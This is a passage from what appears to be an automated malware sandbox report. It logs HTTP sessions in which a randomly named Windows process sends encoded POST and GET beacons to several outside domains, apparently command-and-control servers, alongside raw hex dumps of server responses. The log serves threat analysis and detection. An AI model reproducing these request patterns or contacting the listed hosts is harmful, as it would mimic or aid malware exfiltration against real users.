                                                                Data Raw: 31 66 61 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 e4 b2 eb 92 dc c6 95 2e fa 9b fd 14 10 14 24 bb ed ce 42 dd 2f cd aa f6 9e b1 e5 73 bc c3 de 72 58 9a f0 9e 90 74 7a 27 80 04 90 ea 44 26 94 48 74 75 89 d3 3f 24 91 34 87 6f 31 e1 b0 5b e4 11 ad e1 a6 ad 08 9e 27 41 bd cd 59 40 02 55 a8 2a 54 5f c8 6e 1d 8f 0f a5 46 ad 5c f7 ef 5b df f8 bd 5f 7c f8 f3 8f ff f5 b7 1f 18 81 0a d9 e1 ce 38 fb 31 5c 2a 27 a6 54 cc 34 18 e6 fe c4 c4 d2 cc 42 04 bb 87 3b 77 c6 21 51 d8 70 02 2c 63 a2 26 e6 bf 7c fc 4b 34 34 0d 6b 11 e1 38 24 13 f3 84 92 69 24 a4 32 0d 47 70 45 38 64 4e a9 ab 82 89 4b 4e a8 43 50 fe d8 37 28 a7 8a 62 86 62 07 33 32 69 15 7d 18 e5 c7 86 24 6c 62 46 52 78 94 11 d3 08 24 f1 26 66 a0 54 74 60 59 7e 18 f9 0d 21 7d eb d4 e3 56 ab a6 8a 72 df c6 ce f1 5a 59 80 67 98 d3 19 d6 a5 21 93 91 d3 88 82 a8 28 57 54 31 72 98 9e cf 1f a5 7f 9b 7f 95 be 4c 9f 1b e9 ff 33 7f 96 be 32 e6 8f e7 4f d3 ef e0 ef fb f4 79 c3 b8 f7 fe b0 dd 6a 3d 30 f2 cc ef e6 8f d3 37 90 f4 5c 3f 5f a4 6f e0 f7 e9 fc c9 d2 75 9e be [TRUNCATED]
                                                                Data Ascii: 1faa.$B/srXtz'D&Htu?$4o1['AY@U*T_nF\[_|81\*'T4B;w!Qp,c&|K44k8$i$2GpE8dNKNCP7(bb32i}$lbFRx$&fTt`Y~!}VrZYg!(WT1rL32Oyj=07\?_ouN_Yo<:sl;Ka_w?'($azX~/IK0=vg=aS(W:(K;0:f3:5ZllU<rU"cTDQ+*%peTL(No:uyxw`kp#TW:RihP|N?"JQxh8&"yPVSh.V^5}:hj&9UP~PwtCHC&nU>a<y@)o|I1h;O3>hlx~q'FO;v>{x!}.{,8"!$VW4.'SxqYB>v$GJH+@+GF$\z
                                                                Dec 9, 2024 08:44:12.232319117 CET1236INData Raw: b3 5d b5 b7 77 06 44 38 41 36 ee ec 6c 31 3e da 85 19 d9 6a a4 e1 00 54 f9 3b e2 a8 dd e6 7e 73 1f de 98 9f 60 b8 03 75 55 b0 7c 06 84 fa 81 da 03 07 a0 66 1f c3 1d 77 15 a4 37 f7 1e 68 00 d9 96 ff 42 b9 ea b4 ff 49 4a 3c db 25 0d 1f 76 ca 8e 08
                                                                Data Ascii: ]wD8A6l1>jT;~s`uU|fw7hBIJ<%vn/'wmH @"H&D}v$8)4P1Ea4q4H4i7.|x=4{%mg[mzbwnRIwM:AnW^&5$J
                                                                Dec 9, 2024 08:44:12.232331038 CET1236INData Raw: 33 cc e9 0c a4 2e 7d 6b 1a 21 00 a2 60 b6 15 b1 c4 a7 3c b6 02 60 82 48 e4 09 01 3a 47 84 91 6c 33 21 2d ca 1d ab ec 0d 5d 2d 4f e6 85 6e 03 1e 3f 03 32 27 ad 46 bf d1 6d dd 37 42 e2 52 3c b9 0f 5c de 37 2c 58 37 5f 24 5f 0f a6 e5 b0 f4 6e 31 a2
                                                                Data Ascii: 3.}k!`<`H:Gl3!-]-On?2'Fm7BR<\7,X7_$_n1wvPRFfF;w4x!1W jK\NQ`6hp-`UPl4aBQ3!5=2R$*f2d]( f9F]Apa$Zg
                                                                Dec 9, 2024 08:44:12.232769966 CET1236INData Raw: 7f 23 f8 83 43 e2 dd e6 be 51 fc df 68 af 5f b1 ac 76 09 89 00 09 f0 a9 3f bd 66 4d 75 77 5b 35 fc ca 68 39 b9 ae 76 eb 64 91 a8 4c 95 ee 6a 39 ea 94 3d da bd de be b1 fc b4 f6 f6 17 89 ab 33 5a db 26 38 92 c6 17 6e 07 95 67 07 d3 80 48 b2 db a0
                                                                Data Ascii: #CQh_v?fMuw[5h9vdLj9=3Z&8ngH1kK!>2_Rw5X}`dg2}`F}"a|`8+"7C?7\z0 qAZi97+!61rKBtAIH~YYFw^R8rwU
                                                                Dec 9, 2024 08:44:12.232968092 CET1236INData Raw: 6d 16 1b b5 06 ed de 68 34 1c f6 bb 6f b9 95 14 ef 42 5f 56 7f 55 f5 75 1a 9d b7 db d1 67 c2 c6 ec 9d 99 d3 6d 36 99 bb 9e e6 56 ef 39 6c de cc 41 87 cd ea 5e c3 41 ab d7 ed b4 df 61 2f 68 72 33 8b 41 a3 f5 cd 5a ad d1 75 36 0b 08 63 02 2d f7 bb
                                                                Data Ascii: mh4oB_VUugm6V9lA^Aa/hr3AZu6c-Z*Zk`je|}}D"OEnv/y00Fb-5thpDg)MXbzOfn3={:O7t+^U<xgPs31{7;.#g
                                                                Dec 9, 2024 08:44:12.232979059 CET1236INData Raw: d7 85 bf 1e fc f5 4b 3e 97 ba 3d 30 1c 4c a5 c8 a7 d8 c2 9d 5d 9c b1 d3 c8 09 e1 2a 46 58 12 6c 60 60 29 3b 1c 80 e7 0a dc 97 2e a7 09 01 8e 9a 6e 93 e4 1d ef dc 19 5b b1 9a 31 72 98 9b 01 c1 ee e1 ce ce 38 df c5 61 38 8e 27 66 a6 15 22 a5 90 dd
                                                                Data Ascii: K>=0L]*FXl``);.n[1r8a8'f"fFIb%B/x(!27= 0#0c-8 DmKp^zKONYxFLMXXeOp;""saje@(>HB;b~3{ERD$
                                                                Dec 9, 2024 08:44:12.233108044 CET1236INData Raw: 53 fd bb bf 51 d1 6d 56 7c 71 e1 fc e4 b3 b3 8a f7 48 df ea b6 46 e4 04 be 13 86 56 ff 72 0c 0a db 8c a8 b7 1e a1 7f 36 a2 17 a0 f9 ff 60 e2 3b de e9 ca 13 b5 76 8f 40 95 2a f8 71 a7 fd 68 a4 ae 0c fd b1 78 75 98 88 c9 d1 e2 9e ef 38 b0 dd bc fe
                                                                Data Ascii: SQmV|qHFVr6`;v@*qhxu8NiXa:RL#(&X:oS7v00,Z ]a,=!2}5JEmH`vs:!}4BNLs*GGIMi\b(eD;$%rb/
                                                                Dec 9, 2024 08:44:12.233119965 CET1236INData Raw: e1 ee d1 d2 5c a9 cf 4f 45 1d fd 38 5b 8a 1b 2e bc 79 c6 8c 6a 4c 39 91 46 d5 c7 92 90 23 1f 47 08 34 48 b8 4b dc b2 cb b6 26 59 c1 6a 07 d4 6a 36 d7 c4 b1 91 b6 5d 1b 5d cf f1 5a 03 5c 21 7b d5 b3 4a b6 6e ac 77 ac df 70 4a 5d 9f 28 34 95 38 aa
                                                                Data Ascii: \OE8[.yjL9F#G4HK&Yjj6]]Z\!{JnwpJ](48(aX-an}AJf;0>b+gXfXQoV;"r#mFTmHmN2[XTS@=*B1Qr}%AV[8s*(H.`{L=>-&0@O?hnV
                                                                Dec 9, 2024 08:44:12.233891010 CET1236INData Raw: 6c fe 64 c9 d2 d8 4a 58 f6 cd ed 2b 10 a6 f0 a9 e0 22 9c 6d f2 e5 60 45 7c 21 ab 91 4e 6f 30 b8 8c b4 b2 ac a2 56 bb 5b 61 af c2 42 21 a8 82 c2 3a 16 16 d2 f9 2b 30 f0 0a d0 ae eb a5 02 fc 0a 60 9d 24 56 22 ac 81 ba ee 0f 70 8c 9c 80 32 57 12 5e
                                                                Data Ascii: ldJX+"m`E|!No0V[aB!:+0`$V"p2W^qoX}"@H7(BpV4$w!Jb;WXe&UuyWuV8/VuNf]u.(|hUeL_?;m6!vZrPN
                                                                Dec 9, 2024 08:44:12.233906031 CET1236INData Raw: af 92 3a 42 15 97 b3 14 93 dd 41 1b fa d2 49 de aa be ae 4b 26 30 f7 12 88 fc 21 7d 05 44 a6 df 81 c8 80 ca f4 8d 01 3f df 81 e6 5e e7 f4 a6 7f 4a bf cf a4 77 8b f4 76 87 3f 12 bb 6b 24 3a cb 24 7b 54 55 e4 46 6a 11 ee 95 6a 5f d8 6f 21 e1 6d ac
                                                                Data Ascii: :BAIK&0!}D?^Jwv?k$:${TUFjj_o!md7)oW*5v*giU:yhX9D<^_A%gc+a7@pF:2n'B8"*4\J5PJ+A
                                                                Dec 9, 2024 08:44:12.353029013 CET1236INData Raw: 48 df cc 1f cd 9f cd 9f a4 e7 19 98 9d ec 76 45 db 38 b1 f3 eb d4 c8 60 a9 91 ec e4 37 7b bc 7e ff b2 63 dd 75 87 77 ed d1 5d 77 74 77 d8 47 d9 03 0f f2 47 37 b7 9d dc ee 55 92 70 ee 1f d5 1d 39 c3 58 77 e8 f9 e3 f9 13 03 48 79 39 7f b2 bc f1 0d
                                                                Data Ascii: HvE8`7{~cuw]wtwGG7Up9XwHy9mw]rv+ g>RFz{?J_9~JNJkJBCJOJ+pnEBXs~l,#}lld(qkgcVH-


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                12192.168.2.1249741192.185.147.100801344C:\Program Files (x86)\JycEzTeMQKrLvqFdrvzCnnBkVuTlFGdDUiXjvDhFdgdDsdwSNLmkiipnYhjsmfsEUTowhpegZNOxJo\aDvThgRLSEMTIq.exe
                                                                TimestampBytes transferredDirectionData
                                                                Dec 9, 2024 08:44:13.414529085 CET532OUTGET /yf1h/?Ebfx6=YVpI46H16R/w/kk1bY6rBRavyZUbsgJtp9CZM+Bxvkr6dioDBNQhLHAnFkN0G7WaNsS3kDmK0ayEpl6TGabHmNyPQyubLBbwIZCSROCky8LXr2m/Vfw5jzg=&Njld=LDTtwxbX2vi0G HTTP/1.1
                                                                Host: www.hayaniya.org
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Language: en-us
                                                                Connection: close
                                                                User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                Dec 9, 2024 08:44:14.603224993 CET493INHTTP/1.1 301 Moved Permanently
                                                                Date: Mon, 09 Dec 2024 07:44:14 GMT
                                                                Server: Apache
                                                                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                Cache-Control: no-cache, must-revalidate, max-age=0
                                                                X-Redirect-By: WordPress
                                                                Upgrade: h2,h2c
                                                                Connection: Upgrade, close
                                                                Location: http://hayaniya.org/yf1h/?Ebfx6=YVpI46H16R/w/kk1bY6rBRavyZUbsgJtp9CZM+Bxvkr6dioDBNQhLHAnFkN0G7WaNsS3kDmK0ayEpl6TGabHmNyPQyubLBbwIZCSROCky8LXr2m/Vfw5jzg=&Njld=LDTtwxbX2vi0G
                                                                Content-Length: 0
                                                                Content-Type: text/html; charset=UTF-8


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                13192.168.2.124974213.248.169.48801344C:\Program Files (x86)\JycEzTeMQKrLvqFdrvzCnnBkVuTlFGdDUiXjvDhFdgdDsdwSNLmkiipnYhjsmfsEUTowhpegZNOxJo\aDvThgRLSEMTIq.exe
                                                                TimestampBytes transferredDirectionData
                                                                Dec 9, 2024 08:44:20.233211040 CET784OUTPOST /rxts/ HTTP/1.1
                                                                Host: www.lovel.shop
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Language: en-us
                                                                Accept-Encoding: gzip, deflate
                                                                Connection: close
                                                                Content-Length: 202
                                                                Cache-Control: max-age=0
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Origin: http://www.lovel.shop
                                                                Referer: http://www.lovel.shop/rxts/
                                                                User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                Data Raw: 45 62 66 78 36 3d 5a 4f 43 39 30 6d 54 74 46 51 76 61 6f 6b 78 4d 6a 65 77 4e 6b 43 64 32 57 65 6b 37 75 32 57 38 62 33 74 59 43 55 36 71 51 51 79 53 52 75 49 69 31 6f 6c 45 4e 55 4e 74 37 38 6b 2f 37 30 67 6c 46 6c 72 54 50 33 31 43 76 4f 35 4a 53 64 4a 78 66 68 6c 6f 4d 75 78 4b 35 6c 4e 73 71 5a 74 61 54 50 72 6a 54 56 2f 75 41 56 67 63 64 75 6f 43 32 54 69 4a 31 78 2f 43 4f 41 65 44 50 50 59 71 64 6d 57 6a 4e 65 4a 75 56 66 79 48 4b 77 78 65 33 50 32 4d 75 31 42 7a 68 73 55 36 2f 51 51 6e 44 61 58 39 31 46 38 2b 36 34 73 32 38 33 78 37 4a 4b 75 54 2f 34 56 6d 2b 49 6d 77 54 44 43 7a 4a 77 3d 3d
                                                                Data Ascii: Ebfx6=ZOC90mTtFQvaokxMjewNkCd2Wek7u2W8b3tYCU6qQQySRuIi1olENUNt78k/70glFlrTP31CvO5JSdJxfhloMuxK5lNsqZtaTPrjTV/uAVgcduoC2TiJ1x/COAeDPPYqdmWjNeJuVfyHKwxe3P2Mu1BzhsU6/QQnDaX91F8+64s283x7JKuT/4Vm+ImwTDCzJw==
                                                                Dec 9, 2024 08:44:21.320544004 CET73INHTTP/1.1 405 Method Not Allowed
                                                                content-length: 0
                                                                connection: close


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                14192.168.2.124974313.248.169.48801344C:\Program Files (x86)\JycEzTeMQKrLvqFdrvzCnnBkVuTlFGdDUiXjvDhFdgdDsdwSNLmkiipnYhjsmfsEUTowhpegZNOxJo\aDvThgRLSEMTIq.exe
                                                                TimestampBytes transferredDirectionData
                                                                Dec 9, 2024 08:44:22.897825003 CET804OUTPOST /rxts/ HTTP/1.1
                                                                Host: www.lovel.shop
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Language: en-us
                                                                Accept-Encoding: gzip, deflate
                                                                Connection: close
                                                                Content-Length: 222
                                                                Cache-Control: max-age=0
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Origin: http://www.lovel.shop
                                                                Referer: http://www.lovel.shop/rxts/
                                                                User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                Data Raw: 45 62 66 78 36 3d 5a 4f 43 39 30 6d 54 74 46 51 76 61 35 30 42 4d 69 39 49 4e 73 43 64 35 5a 2b 6b 37 68 57 57 34 62 33 68 59 43 56 75 41 51 6a 57 53 53 4f 34 69 30 70 6c 45 42 30 4e 74 7a 63 6b 2b 32 55 67 69 46 6b 58 74 50 79 56 43 76 50 64 4a 53 59 31 78 66 51 6c 72 4e 2b 78 49 78 46 4e 75 6b 35 74 61 54 50 72 6a 54 56 72 51 41 56 59 63 63 66 59 43 35 57 65 47 75 52 2f 46 65 51 65 44 4c 50 59 75 64 6d 57 42 4e 66 46 55 56 61 32 48 4b 79 70 65 32 65 32 4e 6e 31 42 50 76 4d 55 71 35 44 31 5a 4d 4c 50 6f 2f 31 73 38 36 6f 67 42 77 52 38 68 57 34 6d 46 71 37 42 72 7a 66 66 41 65 41 2f 36 53 36 68 66 65 55 35 43 31 54 77 32 75 79 71 44 63 30 48 79 4a 46 30 3d
                                                                Data Ascii: Ebfx6=ZOC90mTtFQva50BMi9INsCd5Z+k7hWW4b3hYCVuAQjWSSO4i0plEB0Ntzck+2UgiFkXtPyVCvPdJSY1xfQlrN+xIxFNuk5taTPrjTVrQAVYccfYC5WeGuR/FeQeDLPYudmWBNfFUVa2HKype2e2Nn1BPvMUq5D1ZMLPo/1s86ogBwR8hW4mFq7BrzffAeA/6S6hfeU5C1Tw2uyqDc0HyJF0=
                                                                Dec 9, 2024 08:44:23.989308119 CET73INHTTP/1.1 405 Method Not Allowed
                                                                content-length: 0
                                                                connection: close


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                15192.168.2.124974413.248.169.48801344C:\Program Files (x86)\JycEzTeMQKrLvqFdrvzCnnBkVuTlFGdDUiXjvDhFdgdDsdwSNLmkiipnYhjsmfsEUTowhpegZNOxJo\aDvThgRLSEMTIq.exe
                                                                TimestampBytes transferredDirectionData
                                                                Dec 9, 2024 08:44:25.575764894 CET1817OUTPOST /rxts/ HTTP/1.1
                                                                Host: www.lovel.shop
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Language: en-us
                                                                Accept-Encoding: gzip, deflate
                                                                Connection: close
                                                                Content-Length: 1234
                                                                Cache-Control: max-age=0
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Origin: http://www.lovel.shop
                                                                Referer: http://www.lovel.shop/rxts/
                                                                User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                Data Raw: 45 62 66 78 36 3d 5a 4f 43 39 30 6d 54 74 46 51 76 61 35 30 42 4d 69 39 49 4e 73 43 64 35 5a 2b 6b 37 68 57 57 34 62 33 68 59 43 56 75 41 51 6a 65 53 52 2f 59 69 31 4b 4e 45 50 55 4e 74 35 38 6b 46 32 55 67 7a 46 6c 2f 68 50 79 4a 53 76 4d 31 4a 54 39 35 78 4f 53 4e 72 48 2b 78 49 39 6c 4e 7a 71 5a 73 59 54 50 37 5a 54 56 37 51 41 56 59 63 63 63 41 43 77 6a 69 47 70 68 2f 43 4f 41 66 58 50 50 59 47 64 6d 65 72 4e 66 52 2b 53 75 43 48 4b 53 35 65 30 73 65 4e 6f 31 42 4a 69 73 56 31 35 44 4a 38 4d 4c 6a 6b 2f 32 77 53 36 72 41 42 67 67 68 39 48 6f 75 2f 35 62 42 33 37 4e 2f 59 47 7a 44 61 65 49 4e 68 50 6d 52 30 33 42 6c 6b 6f 43 72 50 5a 6d 72 46 61 77 33 70 47 4c 44 46 5a 30 55 56 4b 6f 39 4f 45 55 37 4d 4e 56 78 63 78 43 73 53 50 6a 42 4c 48 6d 38 7a 5a 35 4c 4b 58 48 4a 79 4b 56 75 63 31 41 30 6e 44 32 47 66 47 51 4d 6c 63 63 48 39 6d 36 54 74 6f 72 65 6d 4d 49 73 42 62 4a 43 4d 4f 74 58 31 33 39 6f 33 6f 43 52 65 51 72 31 57 47 4a 6a 2f 65 52 76 41 46 77 4b 70 51 5a 37 41 2b 77 43 41 4c 33 39 61 [TRUNCATED]
                                                                Data Ascii: Ebfx6=ZOC90mTtFQva50BMi9INsCd5Z+k7hWW4b3hYCVuAQjeSR/Yi1KNEPUNt58kF2UgzFl/hPyJSvM1JT95xOSNrH+xI9lNzqZsYTP7ZTV7QAVYcccACwjiGph/COAfXPPYGdmerNfR+SuCHKS5e0seNo1BJisV15DJ8MLjk/2wS6rABggh9Hou/5bB37N/YGzDaeINhPmR03BlkoCrPZmrFaw3pGLDFZ0UVKo9OEU7MNVxcxCsSPjBLHm8zZ5LKXHJyKVuc1A0nD2GfGQMlccH9m6TtoremMIsBbJCMOtX139o3oCReQr1WGJj/eRvAFwKpQZ7A+wCAL39aVgbTPmX24yIGdNXVfG7t7VyaytoAtyJ0OlTe+6H4WwS/l+fI+63oQqa54R4o/eaUFpHhjISYxqNThyab8feZ6atOCJGIezcQLQifj9Xj6IBL1qg/b8oWu8o0doCa0OU41w8HXeb6gFHc/ZMgJtCA7KbN2G7BCfoPkTrDDfSKjALL3clIkCbkBtM6Bj8DY4NfQF2FoZeK/Pyfe/uRCqKfffcdbVL/L/8eN2VoF41h3bVBBYhTEErxXghI30zGYPxpzO/HP63bXwcnro56YRFW8LK+6VlOXsmtsn8JUlJKj//m915xLOjJ4Toyi380LKVLzK55KufJIH6xQvHwLjuxq1mie7iBzSDwR8rkgJBf2XDRYbBjPy5hs1for7qbIt+LXgIOHM1FGqERDccgVngN2qBI8ms49fG8/ge4Ce/aBH7hjNm2+xjDWAXPuRGNfLRIefc1e5DPA0BE5WYh/fOtpJRGNJ7IP0bRAackh8OYXfSWJ0YqrbzqXWQn2zrpSdGBbgOuROt/EHovNfeTp1holcYYh6tUYIovhyp+SEXhQrhGXaa/YLM3+WOzyc/8i3gS0vJLRlXl7PKk/s7bUzdje5shEXRE54whSiuzI1ulR2SvzIMwX2ErHMHDNxwWpXx98QW+BSZZZRFmpqUMeoY9xcf5U7Yt8vpBcc [TRUNCATED]
                                                                Dec 9, 2024 08:44:26.663047075 CET73INHTTP/1.1 405 Method Not Allowed
                                                                content-length: 0
                                                                connection: close


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                16192.168.2.124974513.248.169.48801344C:\Program Files (x86)\JycEzTeMQKrLvqFdrvzCnnBkVuTlFGdDUiXjvDhFdgdDsdwSNLmkiipnYhjsmfsEUTowhpegZNOxJo\aDvThgRLSEMTIq.exe
                                                                TimestampBytes transferredDirectionData
                                                                Dec 9, 2024 08:44:28.234287024 CET530OUTGET /rxts/?Ebfx6=UMqd3Rr/GgjcpDtMifF0hAVXULwugGyaJHdfF0vXYxuoY8NmwcRKHFRQ3Zc522gmFWLmVhpOr5FlbfkrODlmL/pMmG95haE2aMKVRHbzfzsbYvt06DCBrRY=&Njld=LDTtwxbX2vi0G HTTP/1.1
                                                                Host: www.lovel.shop
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Language: en-us
                                                                Connection: close
                                                                User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                Dec 9, 2024 08:44:30.346880913 CET381INHTTP/1.1 200 OK
                                                                content-type: text/html
                                                                date: Mon, 09 Dec 2024 07:44:30 GMT
                                                                content-length: 260
                                                                connection: close
                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 45 62 66 78 36 3d 55 4d 71 64 33 52 72 2f 47 67 6a 63 70 44 74 4d 69 66 46 30 68 41 56 58 55 4c 77 75 67 47 79 61 4a 48 64 66 46 30 76 58 59 78 75 6f 59 38 4e 6d 77 63 52 4b 48 46 52 51 33 5a 63 35 32 32 67 6d 46 57 4c 6d 56 68 70 4f 72 35 46 6c 62 66 6b 72 4f 44 6c 6d 4c 2f 70 4d 6d 47 39 35 68 61 45 32 61 4d 4b 56 52 48 62 7a 66 7a 73 62 59 76 74 30 36 44 43 42 72 52 59 3d 26 4e 6a 6c 64 3d 4c 44 54 74 77 78 62 58 32 76 69 30 47 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?Ebfx6=UMqd3Rr/GgjcpDtMifF0hAVXULwugGyaJHdfF0vXYxuoY8NmwcRKHFRQ3Zc522gmFWLmVhpOr5FlbfkrODlmL/pMmG95haE2aMKVRHbzfzsbYvt06DCBrRY=&Njld=LDTtwxbX2vi0G"}</script></head></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                17192.168.2.12497473.33.130.190801344C:\Program Files (x86)\JycEzTeMQKrLvqFdrvzCnnBkVuTlFGdDUiXjvDhFdgdDsdwSNLmkiipnYhjsmfsEUTowhpegZNOxJo\aDvThgRLSEMTIq.exe
                                                                TimestampBytes transferredDirectionData
                                                                Dec 9, 2024 08:44:35.938441992 CET796OUTPOST /zs4o/ HTTP/1.1
                                                                Host: www.duskgazes.work
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Language: en-us
                                                                Accept-Encoding: gzip, deflate
                                                                Connection: close
                                                                Content-Length: 202
                                                                Cache-Control: max-age=0
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Origin: http://www.duskgazes.work
                                                                Referer: http://www.duskgazes.work/zs4o/
                                                                User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                Data Raw: 45 62 66 78 36 3d 31 32 61 50 55 74 61 38 66 6a 50 64 44 46 45 6d 58 6c 72 54 2f 68 51 33 43 75 35 52 49 78 71 57 4a 45 33 44 4a 55 49 2b 4e 78 70 30 6c 64 36 4d 58 66 6d 51 38 77 38 71 31 33 56 39 52 72 5a 4a 48 31 70 76 39 50 63 4b 63 4a 75 6a 70 50 64 75 77 63 35 4a 33 54 64 57 49 38 4e 32 31 76 6e 45 62 54 71 67 37 70 55 6c 43 33 68 4e 72 4b 58 4f 30 5a 41 63 32 6f 6c 47 68 6d 6e 6a 4b 53 65 78 74 77 6b 4a 51 52 33 77 53 6b 4a 58 65 70 33 59 51 71 37 55 6a 71 62 30 70 67 55 6e 72 6b 57 43 42 53 4a 59 46 74 52 41 4d 7a 34 68 4b 56 46 52 70 74 63 79 78 4d 43 34 55 78 32 48 69 4b 55 34 4e 41 3d 3d
                                                                Data Ascii: Ebfx6=12aPUta8fjPdDFEmXlrT/hQ3Cu5RIxqWJE3DJUI+Nxp0ld6MXfmQ8w8q13V9RrZJH1pv9PcKcJujpPduwc5J3TdWI8N21vnEbTqg7pUlC3hNrKXO0ZAc2olGhmnjKSextwkJQR3wSkJXep3YQq7Ujqb0pgUnrkWCBSJYFtRAMz4hKVFRptcyxMC4Ux2HiKU4NA==
                                                                Dec 9, 2024 08:44:37.076947927 CET73INHTTP/1.1 405 Method Not Allowed
                                                                content-length: 0
                                                                connection: close


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                18192.168.2.12497483.33.130.190801344C:\Program Files (x86)\JycEzTeMQKrLvqFdrvzCnnBkVuTlFGdDUiXjvDhFdgdDsdwSNLmkiipnYhjsmfsEUTowhpegZNOxJo\aDvThgRLSEMTIq.exe
                                                                TimestampBytes transferredDirectionData
                                                                Dec 9, 2024 08:44:38.600310087 CET816OUTPOST /zs4o/ HTTP/1.1
                                                                Host: www.duskgazes.work
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Language: en-us
                                                                Accept-Encoding: gzip, deflate
                                                                Connection: close
                                                                Content-Length: 222
                                                                Cache-Control: max-age=0
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Origin: http://www.duskgazes.work
                                                                Referer: http://www.duskgazes.work/zs4o/
                                                                User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                Data Raw: 45 62 66 78 36 3d 31 32 61 50 55 74 61 38 66 6a 50 64 46 55 55 6d 61 69 2f 54 36 42 51 34 63 65 35 52 43 52 71 53 4a 45 72 44 4a 56 39 35 4d 44 64 30 6b 2f 79 4d 57 65 6d 51 2f 77 38 71 2b 58 56 38 63 4c 5a 43 48 31 74 4a 39 4e 34 4b 63 4a 36 6a 70 4f 74 75 78 76 52 4b 30 6a 64 51 42 63 4e 77 6f 2f 6e 45 62 54 71 67 37 70 42 74 43 78 4a 4e 72 36 6e 4f 6d 74 63 62 6f 34 6c 46 32 57 6e 6a 63 69 65 31 74 77 6b 52 51 54 44 61 53 6e 78 58 65 70 6e 59 52 37 37 54 32 61 62 75 32 77 56 6f 37 58 4c 72 59 41 4e 74 43 76 52 68 46 7a 73 38 50 54 49 4c 32 66 55 6b 6b 50 57 31 5a 6d 50 33 76 4a 70 78 57 48 37 38 59 68 74 4f 73 68 6f 41 52 31 7a 55 6b 4d 6d 79 51 61 45 3d
                                                                Data Ascii: Ebfx6=12aPUta8fjPdFUUmai/T6BQ4ce5RCRqSJErDJV95MDd0k/yMWemQ/w8q+XV8cLZCH1tJ9N4KcJ6jpOtuxvRK0jdQBcNwo/nEbTqg7pBtCxJNr6nOmtcbo4lF2Wnjcie1twkRQTDaSnxXepnYR77T2abu2wVo7XLrYANtCvRhFzs8PTIL2fUkkPW1ZmP3vJpxWH78YhtOshoAR1zUkMmyQaE=
                                                                Dec 9, 2024 08:44:39.683572054 CET73INHTTP/1.1 405 Method Not Allowed
                                                                content-length: 0
                                                                connection: close


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                19192.168.2.12497493.33.130.190801344C:\Program Files (x86)\JycEzTeMQKrLvqFdrvzCnnBkVuTlFGdDUiXjvDhFdgdDsdwSNLmkiipnYhjsmfsEUTowhpegZNOxJo\aDvThgRLSEMTIq.exe
                                                                TimestampBytes transferredDirectionData
                                                                Dec 9, 2024 08:44:41.295137882 CET1829OUTPOST /zs4o/ HTTP/1.1
                                                                Host: www.duskgazes.work
